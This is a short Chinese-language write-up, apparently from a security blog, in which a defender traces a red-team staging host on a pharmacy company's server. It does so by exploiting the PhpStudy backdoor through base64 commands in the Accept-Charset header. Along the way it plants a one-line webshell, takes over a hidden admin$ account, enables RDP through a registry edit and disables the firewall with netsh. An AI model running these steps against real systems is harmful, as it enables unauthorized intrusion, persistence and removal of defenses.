實戰 | 防守方溯源紅隊跳板

通過監測設備發現一個攻擊IP，其資產為某藥房企業，疑似為紅隊跳板，經過溯源，最終確定為該IP為紅隊跳板，感覺本次溯源有不少收獲，且很有意思，因此將溯源過程記錄下來。

1.首先訪問其官網，發現服務器返回信息顯示其使用了PHP/5.4.45，想到如果是利用PhpStudy工具，可能存在后門漏洞

2.查看之前的博客《PhpStudy后門漏洞》，構造payload,將Accept-Charset字段修改為base64加密的命令“phpinfo();”

3.根據結果看出確實存在PhpStudy解析漏洞，根據路徑猜測其為Windows操作系統，執行base64加密的命令“echo system("net user");”

4.探測網站根目錄，執行base64加密的命令“echo system("dir");”

5.下載安裝PhpStudy工具，發現網站根目錄都為www目錄

猜測目標根目錄為“D:\phpStudy\WWW\”，創建文件寫入一句話木馬，base64加密“$fp=fopen('D:\phpStudy\WWW\index2.php',"w+");fputs($fp,'');fclose($fp);”

6.用工具進行連接馬文件

7.探測開放端口信息，未開啟3389端口

8.創建隱藏用戶admin$發現已經被創建，可通過修改密碼，開啟3389端口，遠程登錄

PS：動作太大，不推薦，創建新用戶后，遠程連接新賬號返回“遠程登錄時出現windows不能讓您遠程登錄，因為不能加載您的配置文件”，才使用這種方法

開啟3389端口：

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

關閉防火墻（操作系統版本從PHPinfo截圖可知為Windows Server 2003）：

netsh firewall set opmode mode=disable

9.遠程連接，確定為紅隊攻擊跳板